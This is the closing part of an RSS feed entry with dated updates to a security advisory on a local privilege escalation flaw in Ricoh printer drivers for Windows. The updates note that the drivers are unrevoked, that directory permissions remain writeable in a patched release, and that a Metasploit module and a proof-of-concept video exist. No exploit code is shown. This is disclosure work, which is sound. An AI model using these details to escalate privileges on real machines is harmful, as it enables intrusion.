&lt;p&gt;Update 2020-01-22: The old and vulnerable drivers are still valid. They are not revoked. We made &lt;a class="reference external" href="https://vimeo.com/386585401"&gt;a video of the proof of concept exploit in action&lt;/a&gt;. As a clarification, adding printers does not need administrative access, while installing the driver needs local admin access, but not when the driver is reinstalled and not, when installing printer drivers is allowed via GPOs.&lt;/p&gt;
&lt;p&gt;Update 2020-01-31: Pentagrid had a look at the "PCL6 Driver for Universal Print, Version 4.26.0.0, Released Date: 01/17/2020" driver (&lt;a class="reference external" href="https://support.ricoh.com/bb/pub_e/dr_ut_e/0001316/0001316926/V42600/z88755L19.exe"&gt;https://support.ricoh.com/bb/pub_e/dr_ut_e/0001316/0001316926/V42600/z88755L19.exe&lt;/a&gt;). While the file permissions of the DLLs and the &lt;code class="docutils literal"&gt;dlz&lt;/code&gt; directory are adjusted and do not grant any user write permissions, the permissions of the directories above this level have not changed and are still writeable.&lt;/p&gt;
&lt;p&gt;Update 2020-03-05: Rapid7 released &lt;a class="reference external" href="https://blog.rapid7.com/2020/02/14/metasploit-wrap-up-51/"&gt;a metasploit module&lt;/a&gt; developed by &lt;a class="reference external" href="https://twitter.com/SpaceySpacek"&gt;Shelby Pace&lt;/a&gt; that exploits the Ricoh vulnerability.&lt;/p&gt;
&lt;/section&gt;</description><category>Advisory</category><category>Exploit</category><guid>https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/</guid><pubDate>Wed, 22 Jan 2020 05:42:00 GMT</pubDate></item></channel></rss>